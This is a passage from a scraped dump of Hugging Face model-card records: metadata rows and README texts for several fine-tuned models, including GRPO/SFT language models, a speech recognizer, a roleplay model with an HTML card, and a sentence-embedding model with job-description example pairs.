[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/t-haorandang-ms/wandb_DeepSeek-R1-Distill-Qwen-1.5B/runs/au28winy)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.16.0
- Transformers: 4.50.0
- Pytorch: 2.5.1
- Datasets: 4.0.0
- Tokenizers: 0.21.2
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
sidhantoon/SubX2
|
sidhantoon
| 2025-09-23T15:26:16Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T15:11:00Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
atrost/math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
|
atrost
| 2025-09-23T15:26:03Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"sft",
"trl",
"conversational",
"base_model:Qwen/Qwen3-1.7B-Base",
"base_model:finetune:Qwen/Qwen3-1.7B-Base",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-19T15:49:43Z |
---
base_model: Qwen/Qwen3-1.7B-Base
library_name: transformers
model_name: math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
This model is a fine-tuned version of [Qwen/Qwen3-1.7B-Base](https://huggingface.co/Qwen/Qwen3-1.7B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="atrost/math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/astrost-university-of-wisconsin-madison/sft-regularized-sft/runs/lf39js1s)
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
HamdanXI/Wav2vec2_MyST_Train_and_Dev
|
HamdanXI
| 2025-09-23T15:23:27Z | 7 | 0 |
transformers
|
[
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"generated_from_trainer",
"base_model:facebook/wav2vec2-base-960h",
"base_model:finetune:facebook/wav2vec2-base-960h",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] |
automatic-speech-recognition
| 2025-09-22T04:14:53Z |
---
library_name: transformers
license: apache-2.0
base_model: facebook/wav2vec2-base-960h
tags:
- generated_from_trainer
model-index:
- name: Wav2vec2_MyST_Train_and_Dev
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Wav2vec2_MyST_Train_and_Dev
This model is a fine-tuned version of [facebook/wav2vec2-base-960h](https://huggingface.co/facebook/wav2vec2-base-960h) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 500
- num_epochs: 10
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- Transformers 4.56.2
- Pytorch 2.3.1+cu121
- Datasets 4.1.1
- Tokenizers 0.22.1
|
Obaidreal/blockassist
|
Obaidreal
| 2025-09-23T15:23:08Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"bellowing durable tarantula",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-11T03:30:42Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- bellowing durable tarantula
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
HaoranMS/DeepSeek-R1-Distill-Qwen-1.5B-dt_alpha0d05_topp0d5-0923
|
HaoranMS
| 2025-09-23T15:20:22Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"open-r1",
"conversational",
"dataset:data/open-s1",
"arxiv:2402.03300",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:18:29Z |
---
datasets: data/open-s1
library_name: transformers
tags:
- generated_from_trainer
- open-r1
licence: license
---
# Model Card for None
This model is a fine-tuned version of [None](https://huggingface.co/None) on the [data/open-s1](https://huggingface.co/datasets/data/open-s1) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/t-haorandang-ms/wandb_DeepSeek-R1-Distill-Qwen-1.5B/runs/l7xcduys)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.16.0
- Transformers: 4.50.0
- Pytorch: 2.5.1
- Datasets: 4.0.0
- Tokenizers: 0.21.2
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
easiest-ai-shawn/Phi-4-EAGLE3-sharegpt-unfiltered
|
easiest-ai-shawn
| 2025-09-23T15:15:24Z | 0 | 1 | null |
[
"safetensors",
"llama",
"dataset:Aeala/ShareGPT_Vicuna_unfiltered",
"base_model:dddsaty/phi-4-GPTQ-8bit",
"base_model:finetune:dddsaty/phi-4-GPTQ-8bit",
"license:mit",
"region:us"
] | null | 2025-09-23T14:42:23Z |
---
license: mit
datasets:
- Aeala/ShareGPT_Vicuna_unfiltered
base_model:
- dddsaty/phi-4-GPTQ-8bit
- microsoft/phi-4
---
This is a speculative EAGLE3 model to use with Phi-4, trained on unfiltered example data using SpecForge.
Parameters:
- Epochs: 11
- Max Length: 4096
- TTT Length: 8
|
Frezer02/retrained_llama32-1bn-finetuned
|
Frezer02
| 2025-09-23T15:15:11Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:15:00Z |
---
base_model: unsloth/llama-3.2-1b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Frezer02
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3.2-1b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
Delta-Vector/Austral-4.5B-Winton
|
Delta-Vector
| 2025-09-23T15:14:54Z | 35 | 6 |
transformers
|
[
"transformers",
"safetensors",
"arcee",
"text-generation",
"roleplay",
"finetune",
"axolotl",
"adventure",
"creative-writing",
"GLM4",
"32B",
"conversational",
"en",
"dataset:Delta-Vector/Tauri-Rep-Remover-KTO",
"dataset:Delta-Vector/Orion-LN-V1-ShareGPT",
"dataset:Delta-Vector/Orion-Personamaxx-RP",
"dataset:Delta-Vector/Orion-Co-Writer-51K",
"dataset:Delta-Vector/Orion-Praxis-Co-Writer",
"dataset:Delta-Vector/Orion-Shoujo-AI-Filtered-ShareGPT",
"dataset:Delta-Vector/Orion-PIPPA-Cleaned-V2",
"dataset:Delta-Vector/Orion-Alpindale-LN-ShareGPT",
"dataset:Delta-Vector/Orion-Deepseek-V3-RP-Filtered",
"dataset:Delta-Vector/Orion-Books-V2-ShareGPT",
"dataset:Delta-Vector/Orion-Light-Novels-Roleplay-Logs-Books-Oh-My-duplicate-turns-removed",
"dataset:Delta-Vector/Orion-RP-Guild",
"dataset:Delta-Vector/Orion-Creative_Writing-Complexity",
"dataset:Delta-Vector/Orion-Deepseek-R1-RP-Filtered",
"dataset:Delta-Vector/Orion-Storium-Prefixed-Clean",
"dataset:Delta-Vector/Orion-Misc-Sharegpt-Prefixed",
"dataset:Delta-Vector/Orion-LIMARP-Complexity",
"dataset:Delta-Vector/Orion-BlueSky-10K-Complexity",
"dataset:Delta-Vector/Orion-OpenCAI-ShareGPT",
"dataset:Delta-Vector/Orion-Roleplay-Logs-Sharegpt-Ngram-cleaned",
"dataset:Delta-Vector/Orion-vanilla-backrooms-claude-sharegpt",
"base_model:Delta-Vector/Austral-AFM-SFT",
"base_model:finetune:Delta-Vector/Austral-AFM-SFT",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-17T22:32:04Z |
---
license: apache-2.0
base_model:
- Delta-Vector/Austral-AFM-SFT
language:
- en
library_name: transformers
tags:
- roleplay
- finetune
- axolotl
- adventure
- creative-writing
- GLM4
- 32B
datasets:
- Delta-Vector/Tauri-Rep-Remover-KTO
- Delta-Vector/Orion-LN-V1-ShareGPT
- Delta-Vector/Orion-Personamaxx-RP
- Delta-Vector/Orion-Co-Writer-51K
- Delta-Vector/Orion-Praxis-Co-Writer
- Delta-Vector/Orion-Shoujo-AI-Filtered-ShareGPT
- Delta-Vector/Orion-PIPPA-Cleaned-V2
- Delta-Vector/Orion-Alpindale-LN-ShareGPT
- Delta-Vector/Orion-Deepseek-V3-RP-Filtered
- Delta-Vector/Orion-Books-V2-ShareGPT
- >-
Delta-Vector/Orion-Light-Novels-Roleplay-Logs-Books-Oh-My-duplicate-turns-removed
- Delta-Vector/Orion-RP-Guild
- Delta-Vector/Orion-Creative_Writing-Complexity
- Delta-Vector/Orion-Deepseek-R1-RP-Filtered
- Delta-Vector/Orion-Storium-Prefixed-Clean
- Delta-Vector/Orion-Misc-Sharegpt-Prefixed
- Delta-Vector/Orion-LIMARP-Complexity
- Delta-Vector/Orion-BlueSky-10K-Complexity
- Delta-Vector/Orion-OpenCAI-ShareGPT
- Delta-Vector/Orion-Roleplay-Logs-Sharegpt-Ngram-cleaned
- Delta-Vector/Orion-vanilla-backrooms-claude-sharegpt
---
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Austral 24B Winton</title>
<link href="" rel="stylesheet">
<style>
body {
font-family: 'Roboto Slab', serif;
background: linear-gradient(135deg, #8B4513 0%, #A0522D 25%, #CD853F 50%, #D2691E 75%, #8B4513 100%);
background-size: 400% 400%;
animation: prehistoricShift 20s ease-in-out infinite;
color: #2F1B14;
margin: 0;
padding: 0;
font-size: 16px;
min-height: 100vh;
}
@keyframes prehistoricShift {
0%, 100% { background-position: 0% 50%; }
50% { background-position: 100% 50%; }
}
.container {
margin: 20px;
background: linear-gradient(145deg, #F4E4BC 0%, #DEB887 100%);
padding: 20px;
border-radius: 15px;
box-shadow: 0 8px 25px rgba(0, 0, 0, 0.4), inset 0 2px 5px rgba(255, 255, 255, 0.3);
border: 4px solid #8B4513;
position: relative;
overflow: hidden;
}
.container::before {
content: '';
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
background-image:
radial-gradient(circle at 20% 80%, rgba(139, 69, 19, 0.1) 0%, transparent 50%),
radial-gradient(circle at 80% 20%, rgba(160, 82, 45, 0.1) 0%, transparent 50%);
pointer-events: none;
}
.header h1 {
font-family: 'Cinzel', serif;
font-size: 32px;
color: #5D2E0C;
margin: 0 0 20px 0;
text-align: center;
text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3);
letter-spacing: 2px;
position: relative;
}
.section {
margin-top: 30px;
position: relative;
}
.section h2 {
font-family: 'Cinzel', serif;
font-size: 26px;
color: #5D2E0C;
text-align: center;
margin-bottom: 20px;
text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.2);
letter-spacing: 1px;
}
.info p {
color: #2F1B14;
line-height: 1.7;
font-size: 16px;
text-shadow: 0 1px 1px rgba(255, 255, 255, 0.5);
}
.info img {
width: 85%;
border-radius: 12px;
margin: 0 auto 15px;
display: block;
box-shadow: 0 0 25px rgba(0, 0, 0, 0.4);
border: 3px solid #8B4513;
filter: sepia(20%) contrast(110%);
}
a {
color: #5D2E0C;
text-decoration: none;
transition: all 0.3s ease;
font-weight: 500;
}
a:hover {
color: #8B4513;
text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.2);
}
.button {
display: inline-block;
background: linear-gradient(145deg, #CD853F, #D2691E);
color: #2F1B14;
padding: 12px 24px;
border-radius: 8px;
cursor: pointer;
text-decoration: none;
transition: all 0.3s ease;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
border: 2px solid #8B4513;
}
.button:hover {
background: linear-gradient(145deg, #D2691E, #CD853F);
box-shadow: 0 6px 15px rgba(139, 69, 19, 0.4);
transform: translateY(-2px);
}
pre {
background: linear-gradient(145deg, #F5DEB3, #DEB887);
padding: 20px;
border-radius: 8px;
overflow-x: auto;
border: 2px solid #8B4513;
box-shadow: inset 0 2px 5px rgba(0, 0, 0, 0.1);
}
code {
font-family: 'Courier New', monospace;
color: #2F1B14;
}
.info-card {
background: linear-gradient(145deg, #F5DEB3, #DEB887);
border: 3px solid #8B4513;
border-radius: 12px;
overflow: hidden;
box-shadow: 0 6px 15px rgba(0, 0, 0, 0.2);
}
.info-header {
background: linear-gradient(145deg, #CD853F, #D2691E);
padding: 25px;
border-bottom: 2px solid #8B4513;
}
.info-header h3 {
font-family: 'Cinzel', serif;
color: #2F1B14;
margin: 0 0 15px 0;
font-size: 22px;
text-align: center;
text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.2);
letter-spacing: 1px;
}
.model-tags {
display: flex;
gap: 10px;
flex-wrap: wrap;
justify-content: center;
}
.model-tag {
background: linear-gradient(145deg, #DEB887, #CD853F);
color: #2F1B14;
padding: 6px 12px;
border-radius: 6px;
font-size: 12px;
border: 2px solid #8B4513;
font-weight: 500;
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
}
.model-composition {
padding: 25px;
border-bottom: 2px solid #8B4513;
}
.model-composition h4 {
font-family: 'Cinzel', serif;
color: #5D2E0C;
margin: 0 0 20px 0;
font-size: 18px;
text-align: center;
letter-spacing: 1px;
}
.composition-list {
list-style: none;
padding: 0;
margin: 0;
display: grid;
gap: 15px;
}
.composition-list li {
color: #2F1B14;
display: flex;
align-items: baseline;
gap: 12px;
padding: 10px;
background: rgba(245, 222, 179, 0.5);
border-radius: 6px;
border-left: 4px solid #8B4513;
}
.model-component {
font-weight: 600;
min-width: 120px;
}
.model-description {
padding: 25px;
background: linear-gradient(145deg, #F5DEB3, #F4E4BC);
}
.metrics-section {
margin-bottom: 30px;
}
.metrics-section details {
background: linear-gradient(145deg, #F5DEB3, #DEB887);
border: 3px solid #8B4513;
border-radius: 10px;
padding: 20px;
margin-bottom: 20px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2);
}
.metrics-section summary {
font-family: 'Cinzel', serif;
color: #5D2E0C;
font-size: 18px;
cursor: pointer;
outline: none;
padding: 10px 0;
text-align: center;
font-weight: 500;
letter-spacing: 1px;
}
.creator-section {
margin: 25px 0;
text-align: center;
}
.creator-badge {
display: inline-flex;
align-items: center;
background: linear-gradient(145deg, #CD853F, #D2691E);
border: 3px solid #8B4513;
border-radius: 10px;
padding: 15px 20px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2);
}
.creator-label {
color: #2F1B14;
font-size: 14px;
margin-right: 10px;
font-weight: 500;
}
.creator-link {
display: flex;
align-items: center;
gap: 8px;
color: #2F1B14;
text-decoration: none;
transition: all 0.3s ease;
}
.creator-name {
font-weight: 600;
}
.creator-arrow {
font-size: 16px;
transition: transform 0.3s ease;
}
.creator-link:hover .creator-arrow {
transform: translateX(5px);
}
.link-arrow {
display: inline-block;
transition: transform 0.3s ease;
}
a:hover .link-arrow {
transform: translateX(3px);
}
.axolotl-container {
text-align: center;
margin: 35px 0;
}
.axolotl-container img {
max-width: 300px;
border-radius: 10px;
box-shadow: 0 6px 15px rgba(0, 0, 0, 0.3);
border: 3px solid #8B4513;
filter: sepia(30%) contrast(110%);
}
.fossil-texture {
position: relative;
}
.fossil-texture::after {
content: '';
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
background-image:
radial-gradient(circle at 25% 25%, rgba(139, 69, 19, 0.05) 2px, transparent 2px),
radial-gradient(circle at 75% 75%, rgba(160, 82, 45, 0.05) 1px, transparent 1px);
background-size: 50px 50px, 30px 30px;
pointer-events: none;
}
</style>
</head>
<body>
<div class="container fossil-texture">
<div class="header">
<h1>Austral 4.5B Winton</h1>
</p>
</div>
<div class="info">
<img src="https://cdn-uploads.huggingface.co/production/uploads/66c26b6fb01b19d8c3c2467b/jxUvuFK1bdOdAPiYIcBW5.jpeg" alt="Model banner">
<div style="text-align: center;">
<div class="creator-section">
<div class="creator-badge">
<span class="creator-label">Trained by</span>
<a href="https://huggingface.co/Delta-Vector" target="_blank" class="creator-link">
<span class="creator-name">Delta-Vector</span>
</a>
</div>
</div>
<div class="model-info">
<h2>Overview</h2>
<div class="info-card">
<div class="info-header">
<h3>Austral 4.5B - Winton</h3>
<div class="model-tags">
<span class="model-tag">AFM-Based</span>
<span class ="model-tag">KTO enhanced</span>
<span class ="model-tag">Adventure/Roleplay generalist</span>
<span class="model-tag">4.5B Sized model</span>
</div>
</div>
<div class="model-description">
<p style="font-weight: bold; font-style: italic;">More than 1.5-metres tall, about six-metres long and up to 1000-kilograms heavy, Australovenator Wintonensis was a fast and agile hunter. The largest known Australian theropod.</p>
<p>This is a finetune of arcee-ai/AFM-4.5B to be a generalist Roleplay/Adventure model. This was a multi-stage finetune (SFT->KTO), In testing it has shown to be a great model for Adventure cards & Roleplay, Often pushing the plot forward better then other models, While avoiding some of the slops you'd find in models from Drummer and Co. It also enhanced knowledge of roleplaying domains compared to the base.</p>
<p>Support my finetunes / Me on Kofi: https://Ko-fi.com/deltavector | Thank you to Auri/Joe for helping/Testing ♥</p>
</div>
</div>
</div>
<div class="section">
<h2>Quants</h2>
<div class="info-card">
<div class="model-composition">
<h4>Quants Formats</h4>
<ul class="composition-list">
<li><span class="model-component"><a href="https://huggingface.co/mradermacher/Austral-4.5B-Winton-GGUF" target="_blank">GGUF</a></span>For use with LLama.cpp & Forks(Thanks Mradermacher!)</li>
<li><span class="model-component"><a href="" target="_blank">EXL3</a></span>For use with TabbyAPI(Coming soon!)</li>
</ul>
</div>
</div>
</div>
<div class="section">
<h2>Chat Format</h2>
<p>This model utilizes ChatML.</p>
<pre><code><|im_start|>user
Hi there!<|im_end|>
<|im_start|>assistant
Nice to meet you!<|im_end|>
<|im_start|>user
Can I ask a question?<|im_end|>
<|im_start|>assistant</code></pre>
</div>
<div class="section">
<h2>Training</h2>
<p>This model was trained over 4 epochs using 8 x 3090s for the base SFT, Then i used KTO to clean up some coherency issues for 1 epoch, Total time was roughly 8 hours.</p>
<p style="text-align: center; margin-top: 20px;">
<div class="axolotl-container">
<a href="https://github.com/OpenAccess-AI-Collective/axolotl" target="_blank">
<img src="https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl">
</a>
</div>
<div class="section">
<h2>Credits</h2>
<p>TYSM to my friends: Auri, Minh, Trappu, Alicat, Kubernetes Bad, Intervitens, NyxKrage & Kalomaze</p>
</p>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
|
george2cool36/hw2_text_finetune_distilbert
|
george2cool36
| 2025-09-23T15:12:32Z | 7 | 0 |
transformers
|
[
"transformers",
"safetensors",
"distilbert",
"text-classification",
"finetuned",
"homework",
"dataset:ddecosmo/hw_text_dataset",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-22T15:00:37Z |
---
license: mit
tags:
- text-classification
- distilbert
- finetuned
- homework
library_name: transformers
datasets:
- ddecosmo/hw_text_dataset
---
# DistilBERT fine-tuned — HW2 Text
## Task
Fine-tuned **DistilBERT** for text classification on a classmate's HW1 dataset.
- Dataset: `ddecosmo/hw_text_dataset`
- Text column: `Text`
- Label column: `label` (classes: ['asu', 'bucknell', 'cmu', 'duq', 'ucsd', 'uscd'])
- Train/Eval split: 80/20 (stratified if available)
## Training
- Base model: `distilbert-base-uncased`
- Epochs: 3, LR=5e-5, WD=0.01, warmup=10%
- Batch size: 16
- Best model by: F1 (macro)
## Results (Test)
- Accuracy: 0.4000
- F1 (macro): 0.1231
- Precision (macro): nan
- Recall (macro): nan
## Notes & Limitations
- Small student dataset; results may vary with seeds.
- Labels mapped as: {'asu': 0, 'bucknell': 1, 'cmu': 2, 'duq': 3, 'ucsd': 4, 'uscd': 5}
## AI Tool Disclosure
This notebook used ChatGPT for scaffolding code and documentation.
All dataset selection, training, evaluation, and uploads were performed by the student.
|
Youseff1987/qwen-3-4b-instruct-2507-translate-2509-merged
|
Youseff1987
| 2025-09-23T15:12:13Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:09:14Z |
---
base_model: unsloth/qwen3-4b-instruct-2507-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** Youseff1987
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen3-4b-instruct-2507-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
dnth/ssf-retriever-modernbert-embed-base-v4.2
|
dnth
| 2025-09-23T15:11:03Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"modernbert",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:7540",
"loss:MultipleNegativesRankingLoss",
"dataset:dnth/ssf-train-valid-v4.2",
"arxiv:1908.10084",
"arxiv:1705.00652",
"base_model:nomic-ai/modernbert-embed-base",
"base_model:finetune:nomic-ai/modernbert-embed-base",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T15:10:12Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:7540
- loss:MultipleNegativesRankingLoss
base_model: nomic-ai/modernbert-embed-base
widget:
- source_sentence: The Chief Engineer/Senior Engineering Manager (Automatic Fare Collection)
leads and facilitates the implementation of Automatic Fare Collection (AFC) maintenance
regime within the organisation. He/She works closely with the authorities in implementing
new engineering initiatives to enhance the reliability of AFC systems. He demonstrates
his technical expertise in providing advice to cross-disciplinary engineering
studies. His role also includes the establishment of competency standards and
engineering standards to ensure staff are equipped with relevant skills. He excels
in operating in a collaborative environment and functions through his understanding
of the operational activities, industry developments and regulatory requirements.
He maintains a forward-thinking mindset to contribute strategically towards achieving
the department's goals.
sentences:
- The Chief Engineer/Senior Engineering Manager (Rail Signalling Systems) manages
the maintenance and upgrade schedules for rail signalling infrastructure across
the network. He/She partners with transportation authorities to implement new
signalling technologies and provides expert guidance on safety and technical protocols.
This role focuses on developing and enforcing engineering standards specific to
signalling equipment and training personnel accordingly. The manager thrives in
a multidisciplinary team environment, using knowledge of signalling operations,
regulatory mandates, and emerging technologies to ensure system safety and reliability,
while contributing to strategic planning within the transit division.
- The Assistant Horticulturist supports the management and nurturing of plant life
within the organisation’s attraction sites. This role involves assisting in the
upkeep of diverse plant collections and delivering informative presentations to
visitors about the flora and conservation efforts. With keen attention to detail
and a proactive approach, the Assistant Horticulturist monitors plant health and
characteristics, reporting observations accurately. The position requires the
ability to work independently or under supervision, includes physical tasks, and
involves working on a rotating schedule covering weekends, public holidays, and
on-call duties. Extended outdoor work in various weather conditions is expected,
and a valid driving licence may be necessary for duties in expansive park areas.
- The Chief Engineer/Senior Engineering Manager (Automatic Fare Collection) is responsible
for overseeing the deployment and upkeep of the AFC system maintenance program
within the organization. This role involves close collaboration with regulatory
bodies to introduce innovative engineering solutions aimed at improving AFC system
performance and dependability. The incumbent applies deep technical knowledge
to support interdisciplinary engineering projects and leads the formulation of
competency frameworks and technical standards to ensure team proficiency. Operating
effectively in a cooperative setting, the manager leverages insights into operational
workflows, industry trends, and compliance standards, adopting a strategic outlook
to drive the department's long-term objectives.
- source_sentence: The Senior Application Chemist leads technical work and projects
for product development and innovation, and validates the development of application-specific
solutions and new analytical methods, based on technological know-how. He/She
studies market trends and customer needs to assess the feasibility of expanding
existing product lines, in accordance with the organisations business needs. The
Senior Application Chemist supports the technical service team by managing the
execution of technical service, application and product development-related projects
with customers. He also provides technical expertise in troubleshooting technical
issues reported by customers. In addition, he coaches and mentors junior staff
in the application team, and is responsible for managing the teams performance
to achieve organisational goals. The Senior Application Chemist leads a team in
the laboratory, and collaborates closely with the technical service, Research
and Development (R&D), and sales and marketing teams. He is creative and enjoys
solving complex problems. He can manage multiple projects effectively, and possesses
excellent technical writing and presentation skills.
sentences:
- The Relationship Management Director - Commercial leads the development and implementation
of client acquisition strategies, providing clear guidelines to support team members
in cultivating strong client partnerships. This role involves staying informed
about industry trends and sub-sector developments to enhance client service offerings.
The director ensures the team is well-trained on relevant market changes and oversees
credit analysis procedures in compliance with company standards. By guiding and
motivating the team, the director drives performance excellence and fosters a
professional environment that nurtures long-term client engagement. Possessing
keen business insight, the director identifies growth opportunities and influences
stakeholders effectively to achieve business goals, while maintaining a focus
on continuous improvement and team cohesion.
- The Senior Regulatory Affairs Specialist manages compliance projects within the
pharmaceutical industry, ensuring all products meet regional and international
regulatory requirements. This role involves coordinating submissions, monitoring
changes in legislation, and liaising with regulatory authorities to facilitate
product approvals. The Senior Regulatory Affairs Specialist leads a team responsible
for regulatory strategy and documentation, providing training and mentorship to
junior staff. Collaboration with quality assurance, manufacturing, and marketing
teams is essential to maintain adherence to regulatory standards. Strong project
management, attention to detail, and knowledge of regulatory frameworks are critical
for success in this position.
- The Senior Application Chemist is responsible for directing technical projects
and pioneering product innovations while developing and validating new analytical
techniques tailored to specific applications. This role involves analyzing market
trends and customer requirements to determine the potential for expanding product
offerings aligned with corporate objectives. The Senior Application Chemist collaborates
with the technical service team to oversee project execution related to applications
